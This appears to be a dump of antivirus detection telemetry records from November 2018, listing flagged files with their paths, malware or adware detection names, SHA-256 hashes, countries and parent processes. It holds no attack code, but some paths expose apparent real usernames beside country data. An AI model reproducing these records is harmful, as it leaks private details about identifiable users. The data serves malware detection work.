  Row(detection=Row(filename='hl.exe:xguard', filepath='\\\\?\\C:\\Users\\X\\Desktop\\Counter-Strike\\hl.exe:xguard', filesize=448000, name='HEUR/APC.#M1.#R1'), hash='0dcb5d826951e384eae566b477639eae50e4e0d186e58047c6de99f512d96410', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T13:24:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered fasil', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fasil', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='7a7861079f8bfbb11f413c6082bea20597e46c1b72e952e225c0cab6f75fbb4c', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:41:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-230550-6b9ffcef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0ba9276c\\AVSCAN-20181104-230456-644995B2\\AVSCAN-20181104-230550-6B9FFCEF', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T22:05:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:48:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T15:54:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-220020-3ec9bde5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ca0cc13b\\AVSCAN-20181104-215848-2DAFFB5E\\AVSCAN-20181104-220020-3EC9BDE5', filesize=320000, name='HEUR/AGEN.1015984.#M1.#R1'), hash='59c825e3e530f177f11965667c14361d385dfd53ae02730bd73b1c63e29bde59', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:01:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0345238.exe', filepath='\\\\?\\F:\\System Volume Information\\_restore{EC55BFD7-BEFF-42D8-9D76-6078D4869C8B}\\RP438\\A0345238.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='32b0d34ab16a2d7df472e6d2dd1895000221fcb97e6d645cbbf34ddae7f28197', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:04:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_10462721.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_10462721.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='859fdf95109387e91dde4bcb0691c675fceb741dbcc512ac20ce2ee365b92c7d', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:10:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dealplylivehandler.exe', filepath='C:\\Program Files (x86)\\DealPlyLive\\Update\\1.3.23.0\\DealPlyLiveHandler.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T14:38:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ufcgetvf.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Ulead Systems\\Ulead VideoStudio SE DVD\\ufcGetVF.dll', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='52e5f3c36713991b5258abf76f5cc49856b5aa9c8b3fada2a672f1375b847c82', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:19:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup (1).exe', filepath='C:\\Users\\X\\Downloads\\setup (1).exe', filesize=448000, name='HEUR/AGEN.1029157.#M1.#R1'), hash='b4b2347e4416075fa0dd4ce8155ff2e67bc3a061b9ec6904da41423cc07d5b7b', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T11:29:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='openal32.dll', filepath='C:\\Users\\X\\AppData\\Roaming\\.minecraft\\versions\\1.12\\natives\\OpenAL32.dll', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='92c72f90f3a7ec74e1028e727d081282eaf3506929f2b1469d0f6dc36aa5a2ea', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe', parentsize=2552312, timestamp='2018-11-02T21:34:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='9f3ef947f7082bf578689427e9be445bb650a727ca3ad8d73e0277c50703630f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\9F3EF947F7082BF578689427E9BE445BB650A727CA3AD8D73E0277C50703630F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='9f3ef947f7082bf578689427e9be445bb650a727ca3ad8d73e0277c50703630f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:05:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082011-5366d558', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8160b79c\\AVSCAN-20181102-081646-3B9AB17F\\AVSCAN-20181102-082011-5366D558', filesize=1536000, name='HEUR/AGEN.1009067.#M1.#R1'), hash='809373f0b818ac2617c2898b187f8c42a66ee3f6b5a672c35a6627dbbdd0ad21', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:20:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='st2.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\VOICE\\ST2\\ST2.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='f5f9e77d7351aba0c7e22a5e46869f01b92200aa285994028071efe4af3b4db1', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:28:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Windows\\Temp\\nsw510D.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:33:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Users/katherine/.Trash/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='HK', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T01:40:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vglcoltc.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\vgLCOlTc.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:31:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='start.exe', filepath='\\\\n5550\\kr-server\\廣羅\\kr-server\\server行政\\0管理部\\行政部\\工商萬用管理表格管理表格\\營業管理類\\start.exe', filesize=1536000, name='W32/Stanit.#M1.#R1'), hash='b053c73a956f5f6eeb0c545ff3d47ba12f9ff21a83ff1ddc2f0e66156e7d37d7', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:1upUepgZNU2jR\\\\\\/+9.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T01:02:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='uclwfv.exe', filepath='c:\\users\\X\\appdata\\roaming\\uclwfv.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=452608, timestamp='2018-11-02T12:45:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered maret', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered maret', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='d10b64f3d6d9307bbc0c72f71da97d688d13752bb597a30c0fff8fd1a3dfd5cd', metadata=Row(cmdline='{ECFF4EA7-FE25-46A1-99A1-E072344985D8} S-1-5-21-2376277972-633460711-2922603215-1000:Ich-PC\\\\\\\\Ich:Interactive:Highest[1]', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=192000, timestamp='2018-11-02T03:24:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T17:39:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='openal32.dll', filepath='C:\\Users\\X\\AppData\\Roaming\\.minecraft\\versions\\Medusa-0.4.7\\natives\\OpenAL32.dll', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='7ca1d4aea1d118754aa763a0d3b63493d364c120c9e6f89db480883dbd405802', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe', parentsize=2552312, timestamp='2018-11-02T21:34:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sv.exe', filepath='c:\\users\\X\\appdata\\roaming\\sv.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=427008, timestamp='2018-11-02T20:23:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7fe6fa9b9e5e57ecbf4d8d1b82322641e77c0d325008dc0bbdd9cd705201b3ff', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\7FE6FA9B9E5E57ECBF4D8D1B82322641E77C0D325008DC0BBDD9CD705201B3FF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7fe6fa9b9e5e57ecbf4d8d1b82322641e77c0d325008dc0bbdd9cd705201b3ff', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:00:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-230639-38cbe1c2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_51ec643d\\AVSCAN-20181102-230559-35822134\\AVSCAN-20181102-230639-38CBE1C2', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:06:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='infuzia reagents db.exe', filepath='c:\\users\\X\\desktop\\compleat dp 1.0\\aplication\\infuzia reagents db.exe', filesize=1280000, name='HEUR/APC.#M1.#R1'), hash='b994d386a49ab3f0c90d538aedfe1e328c75eeda024cec306fef1049ee10a608', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3903784, timestamp='2018-11-02T07:36:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='freeyoutubetomp3converter.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\FreeYouTubeToMP3Converter.exe', filesize=34488000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='885a5e231bfa625466aea0661ba90b13ca00a3238d9107b2bbc68da2bdaeaf49', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:53:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=0, name='TR/Patched.Ren.Gen.#M2.#R3780'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:27:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsy1A51.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\fotor_3.41.exe', parentsize=268416568, timestamp='2018-11-02T14:01:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='peraturan kesehatan.exe', filepath='I:\\PERATURAN KESEHATAN\\PERATURAN KESEHATAN.exe', filesize=512000, name='W32/Tapin.#M1.#R1'), hash='a1efe6cf0d6687ed6501867dd71ed288f415c31ecdfdac06541dd918a01a8e1f', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1936464, timestamp='2018-11-02T01:00:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='synctask.exe', filepath='C:\\Users\\X\\AppData\\Local\\29d4af865fc1c2f21c02365364e4bd9d\\synctask.exe', filesize=1600000, name='HEUR/AGEN.1033829.#M1.#R1'), hash='e4b6c38e78ff4fc0d5fbe2998c3558522f1186a370f41cc0a1dd516bb4c88c0b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:56:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e3e9856fceaf2e00244e8dea7ca6ec30b76af573e21cd489c56aee73f5ca45d5', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T21:11:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-074850-7a9df4b9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-074850-7A9DF4B9', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='94c899075fd0f2ea9c7a7170d5e94ea2a4f506c738141d63194d144a233f60a4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:50:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='df5f7e0182e1719ab5ef18eb7bf9522d_2a985cca.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-02_20-58-22\\df5f7e0182e1719ab5ef18eb7bf9522d_2a985cca.exe', filesize=2496000, name='HEUR/AGEN.1007445.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe70_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe70 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T20:01:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='scilexer.dll', filepath='C:\\Program Files\\Adobe\\Adobe Utilities\\ExtendScript Toolkit 2\\SciLexer.dll', filesize=752000, name='W32/Ramnit.C.#M1.#R1'), hash='a49cbd9baa2a5809d79b819039fdb3ff937e7375823b8e90829dadeb71f81433', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T09:09:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-064921-4fab2b10', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9625a9be\\AVSCAN-20181102-064112-1C8CC88F\\AVSCAN-20181102-064921-4FAB2B10', filesize=384000, name='TR/Kazy.172396.13.#M1.#R1'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='music.scr', filepath='C:\\Users\\X\\Music\\Sample Music\\Music.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='c4c2f4ef16473557538410aa8c176d66062d871792759f4ccd832972eb8586f8', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:46:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='dc86dd6c1b8d4af8cb1d2d250a3c78d9d21d5314f73bd753e4778c47942c098f', metadata=Row(cmdline='\\\\\\/Embedding', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-02T23:26:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gcaclientdll.dll', filepath='E:\\Program Files (x86)\\LANGames\\gcaclientdll.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='9a463b51b6d9cda67bd20dd63a75c22fc6f252da0b3d43386a478397bd825cc5', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=450512, timestamp='2018-11-02T07:37:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00296224', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00296224', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:18:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='0dac66f287beb67490479336590f6cc3f95e13e8', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\0dac66f287beb67490479336590f6cc3f95e13e8', filesize=320000, name='Adware/DealPly.bc4be1.#M1.#R1'), hash='bc4be14f575f785c75dd003e76595b5dfecef21de4c54c0851bc45426e3846d6', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:48:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='c2059fc525c035ac4f3adb8f992ce1815d8e867d9cf52fd09bde4b49f4229aae', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\C2059FC525C035AC4F3ADB8F992CE1815D8E867D9CF52FD09BDE4B49F4229AAE', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c2059fc525c035ac4f3adb8f992ce1815d8e867d9cf52fd09bde4b49f4229aae', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T09:25:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023e05a', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023e05a', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:55:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151024-ff282d2a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-151024-FF282D2A', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:10:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T18:16:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291624', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291624', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:51:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023a26a', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023a26a', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:54:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl122.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl122.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:26Z'), dt=datetime.date(2018, 11, 4)),
